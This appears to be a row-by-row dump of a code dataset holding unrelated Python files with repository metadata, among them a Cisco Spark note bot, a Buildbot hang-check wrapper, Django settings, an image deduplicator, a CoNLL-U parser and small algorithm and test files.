message = ciscospark.get_message(ACCESS_TOKEN_SPARK, message_id)
user_message = message.get('text', "None")
# print "Message: {}".format(user_message)
if user_message is None:
return False
if user_message.lower().startswith('boomerang'):
user_message = user_message[9:]
# print "Query (final): {}".format(user_message)
if "help" in user_message[:6].lower():
ciscospark.post_message_rich(
ACCESS_TOKEN_SPARK, room_id, "Supported commands: help, or just add your note")
return True
subject = 'boomerang: {}...'.format(user_message[:30])
# print 'subject: {}'.format(subject)
# print 'body: {}'.format(user_message)
send_email(subject, user_message, person_email)
masked_email = mask_email(person_email)
ciscospark.post_message_rich(
ACCESS_TOKEN_SPARK, room_id, 'boom...the message is on it\'s way to ``{}``'.format(masked_email))
return True
| 27.192308 | 105 | 0.597454 | 397 | 3,535 | 5.120907 | 0.350126 | 0.059518 | 0.039351 | 0.029513 | 0.088539 | 0.088539 | 0.088539 | 0.046237 | 0.046237 | 0 | 0 | 0.003971 | 0.287694 | 3,535 | 129 | 106 | 27.403101 | 0.803415 | 0.108345 | 0 | 0.15 | 0 | 0 | 0.134389 | 0.007747 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.0625 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95a166a1be66e12bea08f462aa18bb723c6a5282 | 4,183 | py | Python | bb-master/sandbox/lib/python3.5/site-packages/buildbot_worker/util/_hangcheck.py | Alecto3-D/testable-greeter | 09e8e488edfb7e46cf5867b2b5a6ebe0b1929f78 | [
"MIT"
] | 2 | 2017-07-11T18:56:27.000Z | 2017-07-28T14:01:12.000Z | bb-master/sandbox/lib/python3.5/site-packages/buildbot_worker/util/_hangcheck.py | Alecto3-D/testable-greeter | 09e8e488edfb7e46cf5867b2b5a6ebe0b1929f78 | [
"MIT"
] | 1 | 2017-07-28T13:53:41.000Z | 2017-07-31T15:30:40.000Z | bb-master/sandbox/lib/python3.5/site-packages/buildbot_worker/util/_hangcheck.py | Alecto3-D/testable-greeter | 09e8e488edfb7e46cf5867b2b5a6ebe0b1929f78 | [
"MIT"
] | null | null | null | """
Protocol wrapper that will detect hung connections.
In particular, since PB expects the server to talk first and HTTP
expects the client to talk first, when a PB client talks to an HTTP
server, neither side will talk, leading to a hung connection. This
wrapper will disconnect in that case, and inform the caller.
"""
from __future__ import absolute_import
from __future__ import print_function
from twisted.internet.interfaces import IProtocol
from twisted.internet.interfaces import IProtocolFactory
from twisted.python.components import proxyForInterface
def _noop():
pass
class HangCheckProtocol(
proxyForInterface(IProtocol, '_wrapped_protocol'), object,
):
"""
Wrap a protocol, so the underlying connection will disconnect if
the other end doesn't send data within a given timeout.
"""
transport = None
_hungConnectionTimer = None
# hung connections wait for a relatively long time, since a busy master may
# take a while to get back to us.
_HUNG_CONNECTION_TIMEOUT = 120
def __init__(self, wrapped_protocol, hung_callback=_noop, reactor=None):
"""
:param IProtocol wrapped_protocol: The protocol to wrap.
:param hung_callback: Called when the connection has hung.
:type hung_callback: callable taking no arguments.
:param IReactorTime reactor: The reactor to use to schedule
the hang check.
"""
if reactor is None:
from twisted.internet import reactor
self._wrapped_protocol = wrapped_protocol
self._reactor = reactor
self._hung_callback = hung_callback
def makeConnection(self, transport):
# Note that we don't wrap the transport for the protocol,
# because we only care about noticing data received, not
# sent.
self.transport = transport
super(HangCheckProtocol, self).makeConnection(transport)
self._startHungConnectionTimer()
def dataReceived(self, data):
self._stopHungConnectionTimer()
super(HangCheckProtocol, self).dataReceived(data)
def connectionLost(self, reason):
self._stopHungConnectionTimer()
super(HangCheckProtocol, self).connectionLost(reason)
def _startHungConnectionTimer(self):
"""
Start a timer to detect if the connection is hung.
"""
def hungConnection():
self._hung_callback()
self._hungConnectionTimer = None
self.transport.loseConnection()
self._hungConnectionTimer = self._reactor.callLater(
self._HUNG_CONNECTION_TIMEOUT, hungConnection)
def _stopHungConnectionTimer(self):
"""
Cancel the hang check timer, since we have received data or
been closed.
"""
if self._hungConnectionTimer:
self._hungConnectionTimer.cancel()
self._hungConnectionTimer = None
class HangCheckFactory(
proxyForInterface(IProtocolFactory, '_wrapped_factory'), object,
):
"""
Wrap a protocol factory, so the underlying connection will
disconnect if the other end doesn't send data within a given
timeout.
"""
def __init__(self, wrapped_factory, hung_callback):
"""
:param IProtocolFactory wrapped_factory: The factory to wrap.
:param hung_callback: Called when the connection has hung.
:type hung_callback: callable taking no arguments.
"""
self._wrapped_factory = wrapped_factory
self._hung_callback = hung_callback
def buildProtocol(self, addr):
protocol = self._wrapped_factory.buildProtocol(addr)
return HangCheckProtocol(protocol, hung_callback=self._hung_callback)
# This is used as a ClientFactory, which doesn't have a specific interface, so forward the additional methods.
def startedConnecting(self, connector):
self._wrapped_factory.startedConnecting(connector)
def clientConnectionFailed(self, connector, reason):
self._wrapped_factory.clientConnectionFailed(connector, reason)
def clientConnectionLost(self, connector, reason):
self._wrapped_factory.clientConnectionLost(connector, reason)
| 35.151261 | 114 | 0.705953 | 463 | 4,183 | 6.209503 | 0.319654 | 0.054261 | 0.037565 | 0.020174 | 0.233043 | 0.171826 | 0.124522 | 0.124522 | 0.124522 | 0.124522 | 0 | 0.000931 | 0.2295 | 4,183 | 118 | 115 | 35.449153 | 0.891095 | 0.344251 | 0 | 0.145455 | 0 | 0 | 0.012992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.236364 | false | 0.018182 | 0.109091 | 0 | 0.454545 | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95a1d9906e1021e68fdbc1dbb87dd5db3ffa4249 | 924 | py | Python | ggcontable/production.py | jmjacquet/IronWeb | 974d7fca8db69ffcfec15325cdb641a1b4b2c526 | [
"MIT"
] | null | null | null | ggcontable/production.py | jmjacquet/IronWeb | 974d7fca8db69ffcfec15325cdb641a1b4b2c526 | [
"MIT"
] | 9 | 2020-09-22T12:34:00.000Z | 2021-09-10T16:32:04.000Z | ggcontable/production.py | jmjacquet/IronWeb | 974d7fca8db69ffcfec15325cdb641a1b4b2c526 | [
"MIT"
] | null | null | null | # Django settings for sistema_bomberos project.
from .settings import *
from decouple import config
DEBUG = False
STATIC_URL = '/staticfiles/'
DB_USER = config('DB_USER')
DB_PASS = config('DB_PASS')
DB_HOST = config('DB_HOST')
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': ENTIDAD_DB, # Or path to database file if using sqlite3.
'USER': DB_USER,
'PASSWORD': DB_PASS, # Not used with sqlite3.
'HOST': DB_HOST, # Set to empty string for localhost. Not used with sqlite3.
'PORT': '',
},
}
TEMPLATE_DEBUG = DEBUG
STATIC_ROOT = os.path.join(SITE_ROOT, 'static')
STATICFILES_DIRS = (
os.path.join(SITE_ROOT, "staticfiles"),
# os.path.join(SITE_ROOT, "dist"),
) | 29.806452 | 124 | 0.589827 | 108 | 924 | 4.87037 | 0.5 | 0.034221 | 0.057034 | 0.079848 | 0.102662 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007564 | 0.284632 | 924 | 31 | 125 | 29.806452 | 0.7882 | 0.297619 | 0 | 0 | 0 | 0 | 0.174727 | 0.037442 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.090909 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
95a9cd06816c62db63d24d33e9d93dd913d3fe62 | 3,555 | py | Python | Assignment 1/ExactDeDup.py | AravindRam/CSCI-572 | 45311cfa9646c3ad8835791325320d08baec622f | [
"Apache-2.0"
] | 1 | 2017-02-15T18:51:36.000Z | 2017-02-15T18:51:36.000Z | Assignment 1/ExactDeDup.py | AravindRam/CSCI-572 | 45311cfa9646c3ad8835791325320d08baec622f | [
"Apache-2.0"
] | null | null | null | Assignment 1/ExactDeDup.py | AravindRam/CSCI-572 | 45311cfa9646c3ad8835791325320d08baec622f | [
"Apache-2.0"
] | null | null | null | import hashlib
import sys
import os
import tika
from tika import parser
fnamesDict = {} # dictionary used to store the names of the filenames.
checksumDict = {} # dictionary used to store the fingerprints of each image file.
countDict = {} # dictionary containing the count of duplicate images
hashinput="" # input string for the hashing algorithm
id = 0 # counter to keep track of the number of the images
No_of_duplicates=0 # counter to keep track of the number of duplicates
duplicate_list = [] # list containing the duplicate image filenames
for filename in os.listdir(sys.argv[1]): # read one file at a time from the image directory passed as command line argument
if(filename!=".DS_Store"):
parsed = parser.from_file(os.getcwd()+"/"+sys.argv[1]+"/"+filename) #use tika-python parser to retrieve the metadata
fnamesDict[id]=filename
if("metadata" in parsed):
if("Content-Length" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["Content-Length"].split(" bytes")[0])
elif("File Size" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["File Size"].split(" bytes")[0])
else:
hashinput+=""
if("tiff:ImageLength" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["tiff:ImageLength"])
elif("ImageLength" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["ImageLength"])
else:
hashinput+=""
if("tiff:ImageWidth" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["tiff:ImageWidth"])
elif("ImageWidth" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["ImageWidth"])
else:
hashinput+=""
if("Content-Type" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["Content-Type"])
else:
hashinput+=""
if("File Modified Date" in parsed["metadata"]):
hashinput+=str(parsed["metadata"]["File Modified Date"])
else:
hashinput+=""
h1 = hashlib.sha1() #compute the hash value using SHA-1 algorithm
h1.update(str(hashinput))
checksum= h1.hexdigest() # get the message digest
if checksum in checksumDict.values():
countDict[checksum].append(id) #append the message digest to the list
else:
countDict[checksum] = []
checksumDict[id]=checksum
id = id+1
hashinput=""
for i in sorted(countDict.keys()):
if(countDict[i] != []):
No_of_duplicates+=len(countDict[i]) #increment the counter for the duplicate images
for index in countDict[i]:
if(index not in duplicate_list):
duplicate_list.append(index)
print "No of exact duplicates : "+str(No_of_duplicates) #print the number of exact duplicates
if(No_of_duplicates > 0):
print "Exact Duplicate Image(s):"
for index in duplicate_list:
print fnamesDict[index] #print the name of the exact duplicate images
| 47.4 | 129 | 0.54346 | 369 | 3,555 | 5.197832 | 0.284553 | 0.116788 | 0.066736 | 0.104275 | 0.271116 | 0.24609 | 0.24609 | 0.24609 | 0.033368 | 0 | 0 | 0.005628 | 0.350211 | 3,555 | 74 | 130 | 48.040541 | 0.824675 | 0.199437 | 0 | 0.203125 | 0 | 0 | 0.148057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.078125 | null | null | 0.046875 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95adcd2061e2c931da7dfba50c3bcd620348774b | 15,746 | py | Python | conllu/conllu.py | spyysalo/conllu.py | 34794373afdf8b8353ddb6a4b6d52937f353eed0 | [
"MIT"
] | 13 | 2016-07-11T22:44:56.000Z | 2020-03-11T11:37:41.000Z | conllu/conllu.py | spyysalo/conllu.py | 34794373afdf8b8353ddb6a4b6d52937f353eed0 | [
"MIT"
] | 1 | 2018-03-22T05:25:42.000Z | 2018-03-22T05:25:42.000Z | conllu/conllu.py | spyysalo/conllu.py | 34794373afdf8b8353ddb6a4b6d52937f353eed0 | [
"MIT"
] | 4 | 2017-05-02T07:16:42.000Z | 2019-09-17T20:22:59.000Z | #!/usr/bin/env python
# CoNLL-U format support
import re
import codecs
import brat
from itertools import groupby
# feature name-value separator
FSEP = '='
# dependency head-rel separator
DSEP = ':'
# Free-form text annotation type in brat export
COMMENT_TYPE = 'AnnotatorNotes'
class FormatError(Exception):
def __init__(self, msg, line=None, linenum=None):
self.msg = msg
self.line = line
self.linenum = linenum
def __str__(self):
msg = self.msg
if self.line is not None:
msg += ': "'+self.line.encode('ascii', 'replace')+'"'
if self.linenum is not None:
msg += ' (line %d)' % self.linenum
return msg
CPOSTAG_RE = re.compile(r'^[a-zA-Z]+$')
POSTAG_RE = re.compile(r'^[\x20-\xff]+$')
class Element(object):
"""Represents CoNLL-U word or multi-word token."""
def __init__(self, id_, form, lemma, cpostag, postag,
feats, head, deprel, deps, misc, offset=0):
self.id = id_
self.form = form
self.lemma = lemma
self.cpostag = cpostag
self.postag = postag
self._feats = feats
self.head = head
self.deprel = deprel
self._deps = deps
self.misc = misc
self.offset = offset
self.sentence = None
self.validate()
self._fmap = None
self._dlist = None
def validate(self):
# minimal format validation (incomplete)
if not self.is_word():
# TODO: check multi-word tokens
return
# some character set constraints
if not CPOSTAG_RE.match(self.cpostag):
raise FormatError('invalid CPOSTAG: %s' % self.cpostag)
if not POSTAG_RE.match(self.postag):
raise FormatError('invalid POSTAG: %s' % self.postag)
# no feature is empty
if any(True for s in self._feats if len(s) == 0):
raise FormatError('empty feature: %s' % str(self._feats))
# feature names and values separated by feature separator
if any(s for s in self._feats if len(s.split(FSEP)) < 2):
raise FormatError('invalid features: %s' % str(self._feats))
# no feature name repeats
if any(n for n, g in groupby(sorted(s.split(FSEP)[0] for s in self._feats))
if len(list(g)) > 1):
raise FormatError('duplicate features: %s' % str(self._feats))
# head is integer
try:
int(self.head)
except ValueError:
raise FormatError('non-int head: %s' % self.head)
def is_word(self):
try:
val = int(self.id)
return True
except ValueError:
return False
def has_feat(self, name):
return name in self.feat_map()
def add_feats(self, feats):
# name-value pairs
assert not any(nv for nv in feats if len(nv) != 2)
self._feats.extend(FSEP.join(nv) for nv in feats)
self._fmap = None
def set_feats(self, feats):
self._feats = []
self.add_feats(feats)
self._fmap = None
def remove_feat(self, name, value):
nv = FSEP.join((name, value))
self._feats.remove(nv)
self._fmap = None
def append_misc(self, value):
if self.misc == '_':
self.misc = value
else:
self.misc = self.misc + '|' + value
def feat_names(self):
return [f.split(FSEP)[0] for f in self._feats]
def feat_map(self):
if self._fmap is None:
try:
self._fmap = dict([f.split(FSEP, 1) for f in self._feats])
except ValueError:
raise ValueError('failed to convert ' + str(self._feats))
return self._fmap
def feats(self):
return self.feat_map().items()
def deps(self, include_primary=False):
if self._dlist is None:
try:
self._dlist = [d.split(DSEP, 1) for d in self._deps]
except:
raise FormatError('failed to parse ' + str(self._deps))
if not include_primary:
return self._dlist
else:
return [(self.head, self.deprel)] + self._dlist
def set_deps(self, dlist):
self._deps = [DSEP.join(hd) for hd in dlist]
self._dlist = None
def has_deprel(self, deprel, check_deps=True):
if self.deprel == deprel:
return True
elif not check_deps:
return False
elif any(d for d in self.deps() if d[1] == deprel):
return True
else:
return False
def wipe_annotation(self):
self.lemma = '_'
self.cpostag = '_'
self.postag = '_'
self._feats = '_'
self.head = '_'
self.deprel = '_'
self._deps = '_'
self.misc = '_'
def to_brat_standoff(self, element_by_id):
"""Return list of brat standoff annotations for the element."""
# base ID, unique within the document
bid = '%s.%s' % (self.sentence.id, self.id)
if self.is_word():
# Word, maps to: Textbound with the coarse POS tag as
# type, freeform text comment with LEMMA, POSTAG and
# MISC (when nonempty) as values, attribute for each
# feature.
# textbounds
spans = [[self.offset, self.offset+len(self.form)]]
textbounds = [
brat.Textbound('T'+bid, self.cpostag, spans, self.form),
]
# comments
freeform = [
('LEMMA', self.lemma),
('POSTAG', self.postag),
]
if self.misc != '_':
freeform.append(('MISC', self.misc))
comments = [
brat.Comment('#'+bid, COMMENT_TYPE, 'T'+bid,
' '.join(u'%s=%s' % f for f in freeform))
]
# attributes
attribs = []
for name, value in self.feats():
aid = 'A'+bid+'-%d'%(len(attribs)+1)
attribs.append(brat.Attribute(aid, name, 'T'+bid, value))
# relations
relations = []
for head, deprel in self.deps(include_primary=True):
if head == '0':
continue # skip root
rid = 'R'+bid+'-%d'%(len(relations)+1)
tid = '%s.%s' % (self.sentence.id, element_by_id[head].id)
args = [('Arg1', 'T'+tid), ('Arg2', 'T'+bid)]
relations.append(brat.Relation(rid, deprel, args))
return textbounds + attribs + relations + comments
else:
# Multi-word token, maps to: Textbound with a special type,
# and free-text comment containing the form.
# Span corresponds to maximum span over covered tokens.
start, end = self.id.split('-')
first, last = element_by_id[start], element_by_id[end]
spans = [[first.offset, last.offset+len(last.form)]]
text = ' '.join(str(element_by_id[str(t)].form)
for t in range(int(start), int(end)+1))
return [
brat.Textbound('T'+bid, 'Multiword-token', spans, text),
brat.Comment('#'+bid, COMMENT_TYPE, 'T'+bid, 'FORM='+self.form)
]
def __unicode__(self):
fields = [self.id, self.form, self.lemma, self.cpostag, self.postag,
self._feats, self.head, self.deprel, self._deps, self.misc]
fields[5] = '_' if fields[5] == [] else '|'.join(sorted(fields[5], key=lambda s: s.lower())) # feats
fields[8] = '_' if fields[8] == [] else '|'.join(fields[8]) # deps
return '\t'.join(fields)
@classmethod
def from_string(cls, s):
fields = s.split('\t')
if len(fields) != 10:
raise FormatError('got %d/10 field(s)' % len(fields), s)
fields[5] = [] if fields[5] == '_' else fields[5].split('|') # feats
fields[8] = [] if fields[8] == '_' else fields[8].split('|') # deps
return cls(*fields)
class Sentence(object):
def __init__(self, id_=0, filename=None, base_offset=0):
"""Initialize a new, empty Sentence."""
self.comments = []
self._elements = []
self.id = id_
self.filename = filename
self.base_offset = base_offset
self.next_offset = base_offset
# mapping from IDs to elements
self._element_by_id = None
def append(self, element):
"""Append word or multi-word token to sentence."""
self._elements.append(element)
assert element.sentence is None, 'element in multiple sentences?'
element.sentence = self
element.offset = self.next_offset
if element.is_word():
self.next_offset += len(element.form) + 1
else:
# multi-word token; don't shift position of next token
pass
# reset cache (TODO: extend instead)
self._element_by_id = None
def empty(self):
return self._elements == []
def words(self):
"""Return a list of the words in the sentence."""
return [e for e in self._elements if e.is_word()]
def text(self, use_tokens=False, separator=' '):
"""Return the text of the sentence."""
if use_tokens:
raise NotImplementedError('multi-word token text not supported.')
else:
return separator.join(w.form for w in self.words())
def length(self, use_tokens=False):
"""Return the length of the sentence text."""
return len(self.text(use_tokens))
def element_by_id(self):
"""Return mapping from id to element."""
if self._element_by_id is None:
self._element_by_id = { e.id: e for e in self._elements }
return self._element_by_id
def get_element(self, id_):
"""Return element by id."""
return self.element_by_id()[id_]
def wipe_annotation(self):
for e in self._elements:
if e.is_word():
e.wipe_annotation()
def remove_element(self, id_):
# TODO: implement for cases where multi-word tokens span the
# element to remove.
assert len(self.words()) == len(self._elements), 'not implemented'
# there must not be references to the element to remove
for w in self.words():
assert not any(h for h, d in w.deps(True) if h == id_), \
'cannot remove %s, references remain' % id_
# drop element
element = self.get_element(id_)
self._elements.remove(element)
self._element_by_id = None
# update IDs
id_map = { u'0' : u'0' }
for i, w in enumerate(self.words()):
new_id = unicode(i+1)
id_map[w.id] = new_id
w.id = new_id
for w in self.words():
w.head = id_map[w.head]
w.set_deps([(id_map[h], d) for h, d in w.deps()])
def dependents(self, head, include_secondary=True):
if isinstance(head, Element):
head_id = head.id
deps = []
for w in self.words():
if not include_secondary:
wdeps = [(w.head, w.deprel)]
else:
wdeps = w.deps(include_primary=True)
for head, deprel in wdeps:
if head == head_id:
deps.append((w.id, deprel))
return deps
def assign_offsets(self, base_offset=None, use_tokens=False):
"""Assign offsets to sentence elements."""
if base_offset is not None:
self.base_offset = base_offset
offset = self.base_offset
if use_tokens:
raise NotImplementedError('multi-word token text not supported.')
else:
# Words are separated by a single character and multi-word
# tokens appear at the start of the position of their
# initial words with zero-width spans.
for e in self._elements:
e.offset = offset
if e.is_word():
offset += len(e.form) + 1
def to_brat_standoff(self):
"""Return list of brat standoff annotations for the sentence."""
# Create mapping from ID to element.
annotations = []
for element in self._elements:
annotations.extend(element.to_brat_standoff(self.element_by_id()))
return annotations
def __unicode__(self):
element_unicode = [unicode(e) for e in self._elements]
return '\n'.join(self.comments + element_unicode)+'\n'
class Document(object):
def __init__(self, filename=None):
self._sentences = []
self.filename = filename
def append(self, sentence):
"""Append sentence to document."""
self._sentences.append(sentence)
def empty(self):
return self._sentences == []
def words(self):
"""Return a list of the words in the document."""
return [w for s in self.sentences() for w in s.words()]
def sentences(self):
"""Return a list of the sentences in the document."""
return self._sentences
def text(self, use_tokens=False, element_separator=' ',
sentence_separator='\n'):
return sentence_separator.join(s.text(use_tokens, element_separator)
for s in self.sentences())
def to_brat_standoff(self):
"""Return list of brat standoff annotations for the document."""
annotations = []
for sentence in self._sentences:
annotations.extend(sentence.to_brat_standoff())
return annotations
def _file_name(file_like, default='document'):
"""Return name of named file or file-like object, or default if not
available."""
# If given a string, assume that it's the name
if isinstance(file_like, basestring):
return file_like
try:
return file_like.name
except AttributeError:
return default
def read_documents(source, filename=None):
"""Read CoNLL-U format, yielding Document objects."""
if filename is None:
filename = _file_name(source)
current = Document(filename)
for sentence in read_conllu(source, filename):
# TODO: recognize and respect document boundaries in source data.
current.append(sentence)
yield current
def read_conllu(source, filename=None):
"""Read CoNLL-U format, yielding Sentence objects.
Note: incomplete implementation, lacks validation."""
# If given a string, assume it's a file name, open and recurse.
if isinstance(source, basestring):
with codecs.open(source, encoding='utf-8') as i:
for s in read_conllu(i, filename=source):
yield s
return
if filename is None:
filename = _file_name(source)
sent_num, offset = 1, 0
current = Sentence(sent_num, filename, offset)
for ln, line in enumerate(source):
line = line.rstrip('\n')
if not line:
if not current.empty():
# Assume single character sentence separator.
offset += current.length() + 1
yield current
else:
raise FormatError('empty sentence', line, ln+1)
sent_num += 1
current = Sentence(sent_num, filename, offset)
elif line[0] == '#':
current.comments.append(line)
else:
try:
current.append(Element.from_string(line))
except FormatError, e:
e.linenum = ln+1
raise e
assert current.empty(), 'missing terminating whitespace'
| 34.082251 | 108 | 0.563699 | 1,953 | 15,746 | 4.420379 | 0.154634 | 0.015985 | 0.019113 | 0.015638 | 0.222402 | 0.147573 | 0.118499 | 0.09788 | 0.062319 | 0.056064 | 0 | 0.004607 | 0.32459 | 15,746 | 461 | 109 | 34.156182 | 0.807146 | 0.093802 | 0 | 0.227273 | 0 | 0 | 0.041827 | 0 | 0 | 0 | 0 | 0.004338 | 0.015152 | 0 | null | null | 0.00303 | 0.012121 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95b5edc6b1bc1ba2f265a5431c58400fcfe3d0c9 | 433 | py | Python | torch_inception_resnet_v2/utils/functions.py | mhconradt/inception-resnet-v2 | 0816e9885eb7034d99a67519efa0642578526a3e | [
"MIT"
] | 9 | 2019-11-28T01:33:43.000Z | 2021-09-06T06:51:47.000Z | torch_inception_resnet_v2/utils/functions.py | mhconradt/inception-resnet-v2 | 0816e9885eb7034d99a67519efa0642578526a3e | [
"MIT"
] | 1 | 2022-02-06T12:03:00.000Z | 2022-02-07T02:30:47.000Z | torch_inception_resnet_v2/utils/functions.py | mhconradt/inception-resnet-v2 | 0816e9885eb7034d99a67519efa0642578526a3e | [
"MIT"
] | 4 | 2019-12-12T05:35:28.000Z | 2021-04-30T18:41:41.000Z | from .convolution_config import PadConfig
def find_first_before(filter_fn, arr, idx):
for item in arr[:idx][::-1]:
if filter_fn(item):
return item
def parallel_shifted_map(fn, start):
is_not_pad = lambda node: not isinstance(node, PadConfig)
def __run__(items):
return [fn(item, find_first_before(is_not_pad, items, i) if i else start) for i, item in enumerate(items)]
return __run__
| 27.0625 | 114 | 0.688222 | 66 | 433 | 4.19697 | 0.515152 | 0.086643 | 0.108303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002941 | 0.214781 | 433 | 15 | 115 | 28.866667 | 0.811765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0.1 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95b62dd7f2dbd4887491c9b50af2e6cd9f6d4a94 | 1,271 | py | Python | wordPattern2.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | wordPattern2.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | wordPattern2.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# pattern = "abab", str = "redblueredblue" should return true.
# pattern = "aaaa", str = "asdasdasdasd" should return true.
# pattern = "aabb", str = "xyzabcxzyabc" should return false.
class Solution(object):
def wordPatternMatch(self, pattern, str):
dic = {}
return self.isMatch(str, 0, pattern, 0, dic)
def isMatch(self, str, i, pat, j, dic):
if i == len(str) and j == len(pat):
return True
elif i == len(str):
return False
elif j == len(pat):
return False
if pat[j] in dic:
curr = dic[pat[j]]
# 比如当前pat是a,应该找red,结果发现剩下的str不是以red开头,果断false
if not str.startswith(curr, i):
return False
else:
# 继续找下一个match
return self.isMatch(str, i + len(curr), pat, j + 1, dic)
# 新的pattern单词, backtracking
else:
for k in range(i, len(str)):
# 为新的pattern字母添加新对应的单词
dic[pat[j]] = str[i:k + 1]
if self.isMatch(str, k + 1, pat, j + 1, dic):
return True
dic.pop(pat[j])
return False
test = Solution()
print test.wordPatternMatch("aabb", "11112222") | 32.589744 | 72 | 0.515342 | 148 | 1,271 | 4.425676 | 0.351351 | 0.042748 | 0.064122 | 0.070229 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018496 | 0.36192 | 1,271 | 39 | 73 | 32.589744 | 0.789149 | 0.239182 | 0 | 0.307692 | 0 | 0 | 0.012513 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95b9aa4be2c76aa96890942d69a75a3f195bba22 | 685 | py | Python | lecture09/colors_test.py | nd-cse-30872-fa20/cse-30872-fa20-examples | 7a991a0499e03bf91ac8ba40c99245d5d926e20c | [
"MIT"
] | 1 | 2021-09-07T19:02:43.000Z | 2021-09-07T19:02:43.000Z | lecture09/colors_test.py | nd-cse-30872-fa21/cse-30872-fa21-examples | c3287ac8b49a0de3c9770aadfb77be9080b19277 | [
"MIT"
] | null | null | null | lecture09/colors_test.py | nd-cse-30872-fa21/cse-30872-fa21-examples | c3287ac8b49a0de3c9770aadfb77be9080b19277 | [
"MIT"
] | 6 | 2021-08-25T15:59:08.000Z | 2021-11-12T16:32:11.000Z | #!/usr/bin/env python3
import unittest
import colors
# Test Case
class ColorsTestCase(unittest.TestCase):
def test_00_count_colors(self):
self.assertEqual(
colors.count_colors([0, 1, 2]),
[1, 1, 1]
)
self.assertEqual(
colors.count_colors([0, 1, 2, 0, 1, 1]),
[2, 3, 1]
)
def test_01_expand_counts(self):
self.assertEqual(
colors.expand_counts([1, 1, 1]),
[0, 1, 2]
)
self.assertEqual(
colors.expand_counts([2, 3, 1]),
[0, 0, 1, 1, 1, 2]
)
# Main execution
if __name__ == '__main__':
unittest.main()
| 19.571429 | 53 | 0.506569 | 83 | 685 | 3.963855 | 0.337349 | 0.042553 | 0.255319 | 0.151976 | 0.413374 | 0.212766 | 0.212766 | 0.212766 | 0 | 0 | 0 | 0.079909 | 0.360584 | 685 | 34 | 54 | 20.147059 | 0.671233 | 0.067153 | 0 | 0.173913 | 0 | 0 | 0.012579 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 1 | 0.086957 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95c4d8a91ee8d4d10ff12366fd9c233f02647267 | 5,210 | py | Python | src/kemokrw/transfer_basic.py | Kemok-Repos/kemokrw | bfe2a82e2ef5d3580ed5dfe65129b30bd3fc4971 | [
"MIT"
